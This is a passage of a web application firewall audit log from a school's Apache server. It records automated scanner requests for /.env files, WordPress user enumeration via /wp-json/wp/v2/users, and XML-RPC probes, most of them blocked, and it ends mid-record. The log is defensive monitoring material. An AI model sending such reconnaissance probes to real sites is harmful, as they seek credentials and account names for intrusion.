Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30a09134-Z-- --c8c72969-A-- [03/May/2025:22:51:34 +0700] aBY7hoOgvPi2IO4kz1v9HwAAAJc 103.236.140.4 37254 103.236.140.4 8181 --c8c72969-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.164.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.164.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c8c72969-C-- demo.sayHello --c8c72969-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8c72969-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746287494548194 5652 (- - -) Stopwatch2: 1746287494548194 5652; combined=4089, p1=557, p2=3306, p3=28, p4=31, p5=97, sr=82, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8c72969-Z-- --b7cd2c19-A-- [03/May/2025:22:57:11 +0700] aBY814OgvPi2IO4kz1v9jwAAAJI 103.236.140.4 38250 103.236.140.4 8181 --b7cd2c19-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 142.93.70.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 142.93.70.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b7cd2c19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7cd2c19-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746287831586301 792 (- - -) Stopwatch2: 1746287831586301 792; combined=319, p1=286, p2=0, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7cd2c19-Z-- --bb738027-A-- [03/May/2025:22:58:00 +0700] aBY9CIOgvPi2IO4kz1v9kAAAAJE 103.236.140.4 38252 103.236.140.4 8181 --bb738027-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.15.24 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.15.24 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bb738027-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb738027-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746287880535492 3491 (- - -) Stopwatch2: 1746287880535492 3491; combined=1490, p1=464, p2=988, p3=0, p4=0, p5=37, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb738027-Z-- --777a8815-A-- [03/May/2025:22:58:05 +0700] aBY9DUSOhfQ6W15Bgg8MJQAAAEg 103.236.140.4 38256 103.236.140.4 8181 --777a8815-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.15.24 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.15.24 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --777a8815-C-- demo.sayHello --777a8815-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --777a8815-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746287885031256 6014 (- - -) Stopwatch2: 1746287885031256 6014; combined=4356, p1=548, p2=3579, p3=34, p4=36, p5=95, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --777a8815-Z-- --04b5bf77-A-- [03/May/2025:23:14:17 +0700] aBZA2YOgvPi2IO4kz1sAhAAAAIY 103.236.140.4 45356 103.236.140.4 8181 --04b5bf77-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.85 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.85 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --04b5bf77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04b5bf77-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746288857837816 3323 (- - -) Stopwatch2: 1746288857837816 3323; combined=1478, p1=513, p2=917, p3=0, p4=0, p5=48, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04b5bf77-Z-- --5c6e6e49-A-- [03/May/2025:23:14:26 +0700] aBZA4kSOhfQ6W15Bgg8P6QAAAFE 103.236.140.4 45360 103.236.140.4 8181 --5c6e6e49-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.85 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.85 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5c6e6e49-C-- demo.sayHello --5c6e6e49-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c6e6e49-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746288866048657 6544 (- - -) Stopwatch2: 1746288866048657 6544; combined=4689, p1=623, p2=3831, p3=43, p4=38, p5=92, sr=81, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c6e6e49-Z-- --0b431740-A-- [03/May/2025:23:15:35 +0700] aBZBJ0SOhfQ6W15Bgg8P6wAAAFU 103.236.140.4 45368 103.236.140.4 8181 --0b431740-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0b431740-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b431740-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746288935338620 3213 (- - -) Stopwatch2: 1746288935338620 3213; combined=1338, p1=465, p2=843, p3=0, p4=0, p5=30, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b431740-Z-- --74ea056a-A-- [03/May/2025:23:15:42 +0700] aBZBLileQJs6d7wanHHTvgAAAMU 103.236.140.4 45374 103.236.140.4 8181 --74ea056a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.38 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --74ea056a-C-- demo.sayHello --74ea056a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --74ea056a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746288942519675 6653 (- - -) Stopwatch2: 1746288942519675 6653; combined=4644, p1=602, p2=3806, p3=38, p4=42, p5=94, sr=77, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74ea056a-Z-- --f04bb746-A-- [03/May/2025:23:31:14 +0700] aBZE0oOgvPi2IO4kz1sAkwAAAIY 103.236.140.4 45670 103.236.140.4 8181 --f04bb746-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.113.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.113.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f04bb746-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f04bb746-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746289874863410 3235 (- - -) Stopwatch2: 1746289874863410 3235; combined=1346, p1=472, p2=842, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f04bb746-Z-- --9dc7ba39-A-- [03/May/2025:23:31:22 +0700] aBZE2oOgvPi2IO4kz1sAlgAAAIM 103.236.140.4 45678 103.236.140.4 8181 --9dc7ba39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.113.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.113.2 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9dc7ba39-C-- demo.sayHello --9dc7ba39-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9dc7ba39-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746289882036981 7052 (- - -) Stopwatch2: 1746289882036981 7052; combined=5114, p1=636, p2=4232, p3=40, p4=40, p5=98, sr=100, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9dc7ba39-Z-- --a8970a1e-A-- [03/May/2025:23:31:38 +0700] aBZE6oOgvPi2IO4kz1sAmwAAAI0 103.236.140.4 45692 103.236.140.4 8181 --a8970a1e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a8970a1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8970a1e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746289898120891 2396 (- - -) Stopwatch2: 1746289898120891 2396; combined=1362, p1=442, p2=890, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8970a1e-Z-- --25953e58-A-- [03/May/2025:23:31:40 +0700] aBZE7IOgvPi2IO4kz1sAnQAAAJM 103.236.140.4 45696 103.236.140.4 8181 --25953e58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.58 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --25953e58-C-- demo.sayHello --25953e58-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --25953e58-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746289900597622 17840 (- - -) Stopwatch2: 1746289900597622 17840; combined=28229, p1=570, p2=3494, p3=34, p4=36, p5=12062, sr=73, sw=63, l=0, gc=11970 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25953e58-Z-- --cf8ba37d-A-- [03/May/2025:23:56:07 +0700] aBZKp0SOhfQ6W15Bgg8QXgAAAEc 103.236.140.4 46516 103.236.140.4 8181 --cf8ba37d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cf8ba37d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf8ba37d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746291367580956 3208 (- - -) Stopwatch2: 1746291367580956 3208; combined=1418, p1=475, p2=911, p3=0, p4=0, p5=32, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf8ba37d-Z-- --217d0b48-A-- [03/May/2025:23:56:12 +0700] aBZKrCleQJs6d7wanHHUEQAAAMs 103.236.140.4 46520 103.236.140.4 8181 --217d0b48-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.30 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --217d0b48-C-- demo.sayHello --217d0b48-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --217d0b48-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746291372381724 6162 (- - -) Stopwatch2: 1746291372381724 6162; combined=4432, p1=609, p2=3598, p3=35, p4=37, p5=91, sr=80, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --217d0b48-Z-- --d7cf8504-A-- [03/May/2025:23:56:43 +0700] aBZKy0SOhfQ6W15Bgg8QYgAAAEE 103.236.140.4 46536 103.236.140.4 8181 --d7cf8504-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.177 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d7cf8504-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7cf8504-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746291403636012 2701 (- - -) Stopwatch2: 1746291403636012 2701; combined=1432, p1=513, p2=889, p3=0, p4=0, p5=30, sr=153, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7cf8504-Z-- --982e5515-A-- [03/May/2025:23:56:50 +0700] aBZK0kSOhfQ6W15Bgg8QZAAAAFU 103.236.140.4 46540 103.236.140.4 8181 --982e5515-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.177 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --982e5515-C-- demo.sayHello --982e5515-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --982e5515-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746291410148060 4892 (- - -) Stopwatch2: 1746291410148060 4892; combined=3804, p1=481, p2=3117, p3=24, p4=26, p5=91, sr=95, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --982e5515-Z-- --9ed21c5e-A-- [03/May/2025:23:56:56 +0700] aBZK2ESOhfQ6W15Bgg8QZgAAAEM 103.236.140.4 46544 103.236.140.4 8181 --9ed21c5e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.129 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.129 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9ed21c5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ed21c5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746291416221599 2782 (- - -) Stopwatch2: 1746291416221599 2782; combined=1301, p1=428, p2=844, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: 